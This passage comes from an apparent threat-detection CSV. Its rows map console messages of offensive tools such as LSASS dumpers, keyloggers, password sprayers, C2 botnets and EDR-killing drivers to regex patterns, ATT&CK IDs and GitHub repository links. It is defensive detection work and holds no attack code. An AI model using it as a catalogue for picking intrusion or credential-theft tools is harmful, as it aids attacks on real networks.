Holy handle leak Batman, we have a SYSTEM shell!!*",".{0,1000}\[!\]\sHoly\shandle\sleak\sBatman,\swe\shave\sa\sSYSTEM\sshell!!.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","12933" "*[!] HTTP reflected DCOM authentication failed *",".{0,1000}\[!\]\sHTTP\sreflected\sDCOM\sauthentication\sfailed\s.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","#content","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","12934" "*[!] I will dump all computer passwords*",".{0,1000}\[!\]\sI\swill\sdump\sall\scomputer\spasswords.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#content","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","12935" "*[!] 
inject dll into log process failure *",".{0,1000}\[!\]\sinject\sdll\sinto\slog\sprocess\sfailure\s.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","#content","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","12936" "*[!] In-memory LSASS dump method failed: *",".{0,1000}\[!\]\sIn\-memory\sLSASS\sdump\smethod\sfailed\:\s.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#content","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","12937" "*[!] Insecure resource delegations found. Exporting report:*",".{0,1000}\[!\]\sInsecure\sresource\sdelegations\sfound\.\sExporting\sreport\:.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","#content","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","12938" "*[!] Insecure trustee delegations found. Exporting report: *",".{0,1000}\[!\]\sInsecure\strustee\sdelegations\sfound\.\sExporting\sreport\:\s.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","#content","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","12939" "*[!] Invalid Exfil Method Chosen! 
Data Will Not Be Sent!*",".{0,1000}\[!\]\sInvalid\sExfil\sMethod\sChosen!\sData\sWill\sNot\sBe\sSent!.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","#content","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","12940" "*[!] Invalid sandbox evasion technique provided!*",".{0,1000}\[!\]\sInvalid\ssandbox\sevasion\stechnique\sprovided!.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","12941" "*[!] Invalid sandbox evasion technique provided!*",".{0,1000}\[!\]\sInvalid\ssandbox\sevasion\stechnique\sprovided!.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","12942" "*[!] 
It was not possible to retrieve GPO Policies*",".{0,1000}\[!\]\sIt\swas\snot\spossible\sto\sretrieve\sGPO\sPolicies.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#content","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","12943" "*[!] Looks like Victim * doesn't have office365 Licence!*",".{0,1000}\[!\]\sLooks\slike\sVictim\s.{0,1000}\sdoesn\'t\shave\soffice365\sLicence!.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","#content","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","12944" "*[!] Lsass dump created!*",".{0,1000}\[!\]\sLsass\sdump\screated!.{0,1000}","offensive_tool_keyword","Dumpy","Reuse open handles to dynamically dump LSASS","T1003.001 - T1055.001 - T1083","TA0006","N/A","N/A","Credential Access","https://github.com/Kudaes/Dumpy","1","0","#content","N/A","10","3","243","24","2024-04-04T07:42:26Z","2021-10-13T21:54:59Z","12945" "*[!] 
LSASS dump failed *",".{0,1000}\[!\]\sLSASS\sdump\sfailed\s.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#content","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","12946" "*[!] Modifialbe scheduled tasks were not evaluated due to permissions*",".{0,1000}\[!\]\sModifialbe\sscheduled\stasks\swere\snot\sevaluated\sdue\sto\spermissions.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","#content","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","12947" "*[!] Nim and C# are the only language capable of executing BOFS*",".{0,1000}\[!\]\sNim\sand\sC\#\sare\sthe\sonly\slanguage\scapable\sof\sexecuting\sBOFS.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","#content","N/A","10","1","N/A","N/A","N/A","N/A","12948" "*[!] 
Password spraying will be conducted*",".{0,1000}\[!\]\sPassword\sspraying\swill\sbe\sconducted.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","#content","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","12949" "*[!] Please save this key as it will be required to decrypt the keylogs from the target!*",".{0,1000}\[!\]\sPlease\ssave\sthis\skey\sas\sit\swill\sbe\srequired\sto\sdecrypt\sthe\skeylogs\sfrom\sthe\starget!.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#content","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","12950" "*[!] Please specify smb attack keyword --smbkeyword *",".{0,1000}\[!\]\sPlease\sspecify\ssmb\sattack\skeyword\s\-\-smbkeyword\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#content","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","12951" "*[!] 
Press any key to stop driver and clean up all POC files to avoid detection !*",".{0,1000}\[!\]\sPress\sany\skey\sto\sstop\sdriver\sand\sclean\sup\sall\sPOC\sfiles\sto\savoid\sdetection\s!.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","0","#content","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","12952" "*[!] PRESS TO EXECUTE SHELLCODED EXE*",".{0,1000}\[!\]\sPRESS\sTO\sEXECUTE\sSHELLCODED\sEXE.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","#content","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","12953" "*[!] Rasman service is not running!*",".{0,1000}\[!\]\sRasman\sservice\sis\snot\srunning!.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","#content","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","12954" "*[!] Setting Up C&C Module*",".{0,1000}\[!\]\sSetting\sUp\sC\&C\sModule.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","0","#content","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","12955" "*[!] 
SharpSCCM must be run with local administrator privileges to retrieve policy secret blobs*",".{0,1000}\[!\]\sSharpSCCM\smust\sbe\srun\swith\slocal\sadministrator\sprivileges\sto\sretrieve\spolicy\ssecret\sblobs.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","12956" "*[!] SharpSCCM must be run with local administrator privileges to retrieve policy secret blobs*",".{0,1000}\[!\]\sSharpSCCM\smust\sbe\srun\swith\slocal\sadministrator\sprivileges\sto\sretrieve\spolicy\ssecret\sblobs.{0,1000}","offensive_tool_keyword","SharpSCCM","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","12957" "*[!] 
Shellcoded PE\'s size: *",".{0,1000}\[!\]\sShellcoded\sPE\\\'s\ssize\:\s.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","#content","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","12958" "*[!] SMB reflected DCOM authentication failed*",".{0,1000}\[!\]\sSMB\sreflected\sDCOM\sauthentication\sfailed.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","#content","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","12959" "*[!] Starting gServer *",".{0,1000}\[!\]\sStarting\sgServer\s.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","12960" "*[!] Stealing processes delayed with *",".{0,1000}\[!\]\sStealing\sprocesses\sdelayed\swith\s.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","#content","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","12961" "*[!] 
Success, spawning a system shell!*",".{0,1000}\[!\]\sSuccess,\sspawning\sa\ssystem\sshell!.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","12962" "*[!] Swithed to custom stealing. *",".{0,1000}\[!\]\sSwithed\sto\scustom\sstealing\.\s.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","#content","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","12963" "*[!] The exfiltration modules does not use FireProx*",".{0,1000}\[!\]\sThe\sexfiltration\smodules\sdoes\snot\suse\sFireProx.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#content","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","12964" "*[!] 
The password * will be sprayed on targeted user accounts having*",".{0,1000}\[!\]\sThe\spassword\s.{0,1000}\swill\sbe\ssprayed\son\stargeted\suser\saccounts\shaving.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","#content","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","12965" "*[!] There are no enterprise CAs and therefore no one can request certificates*",".{0,1000}\[!\]\sThere\sare\sno\senterprise\sCAs\sand\stherefore\sno\sone\scan\srequest\scertificates.{0,1000}","offensive_tool_keyword","Certify","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","12966" "*[!] 
There are no enterprise CAs and therefore no one can request certificates*",".{0,1000}\[!\]\sThere\sare\sno\senterprise\sCAs\sand\stherefore\sno\sone\scan\srequest\scertificates.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Certify","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","12967" "*[!] This application can not be injected*",".{0,1000}\[!\]\sThis\sapplication\scan\snot\sbe\sinjected.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","#content","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","12968" "*[!] This may take more time to bruteforce *",".{0,1000}\[!\]\sThis\smay\stake\smore\stime\sto\sbruteforce\s.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#content","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","12969" "*[!] Unable to read PEB address!*",".{0,1000}\[!\]\sUnable\sto\sread\sPEB\saddress!.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","#content","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","12970" "*[!] 
Unhandled ShadowSpray.Kerb exception:*",".{0,1000}\[!\]\sUnhandled\sShadowSpray\.Kerb\sexception\:.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#content","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","12971" "*[!] Unhandled SharpDoor exception*",".{0,1000}\[!\]\sUnhandled\sSharpDoor\sexception.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","#content","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","12972" "*[!] Valid login* expired password: *",".{0,1000}\[!\]\sValid\slogin.{0,1000}\sexpired\spassword\:\s.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","#content","N/A","10","1","79","7","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z","12973" "*[!] Welcom to the Aoyama C&C Server*",".{0,1000}\[!\]\sWelcom\sto\sthe\sAoyama\sC\&C\sServer.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","0","#content","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","12974" "*[!] 
You are running TeamFiltration without a config*",".{0,1000}\[!\]\sYou\sare\srunning\sTeamFiltration\swithout\sa\sconfig.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#content","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","12975" "*[!] You have DCs with RC4 or DES allowed for Kerberos!!!*",".{0,1000}\[!\]\sYou\shave\sDCs\swith\sRC4\sor\sDES\sallowed\sfor\sKerberos!!!.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","#content","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","12976" "*[!][!][!] Checking Directories [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sChecking\sDirectories\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","#content","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","12977" "*[!][!][!] Checking drivers [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sChecking\sdrivers\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","#content","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","12978" "*[!][!][!] 
Checking modules loaded in your current process [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sChecking\smodules\sloaded\sin\syour\scurrent\sprocess\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","#content","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","12979" "*[!][!][!] Checking Services [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sChecking\sServices\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","#content","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","12980" "*[!][!][!] EDR Checks Complete [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sEDR\sChecks\sComplete\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","#content","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","12981" "*[!][!][!] Welcome to SharpEDRChecker by @PwnDexter [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sWelcome\sto\sSharpEDRChecker\sby\s\@PwnDexter\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","#content","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","12982" "*[#] [HELL HALL] Press To QUIT ... 
*",".{0,1000}\[\#\]\s\[HELL\sHALL\]\sPress\s\\sTo\sQUIT\s\.\.\.\s.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","12983" "*[#] Checking file against AMSI Trigger*",".{0,1000}\[\#\]\sChecking\sfile\sagainst\sAMSI\sTrigger.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","12984" "*[#] Ready For ETW Patch.*",".{0,1000}\[\#\]\sReady\sFor\sETW\sPatch\..{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","12985" "*[#] Shellcode located at address *",".{0,1000}\[\#\]\sShellcode\slocated\sat\saddress\s.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","12986" "*[*] Appending access tokens to access_tokens.txt*",".{0,1000}\[.{0,1000}\]\sAppending\saccess\stokens\sto\saccess_tokens\.txt.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation 
